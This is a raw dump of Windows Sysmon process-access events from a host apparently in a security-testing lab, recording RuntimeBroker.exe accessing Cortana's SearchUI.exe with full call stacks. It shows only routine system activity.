12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.438{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.438{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.438{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.438{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.423{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.423{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.423{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.423{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 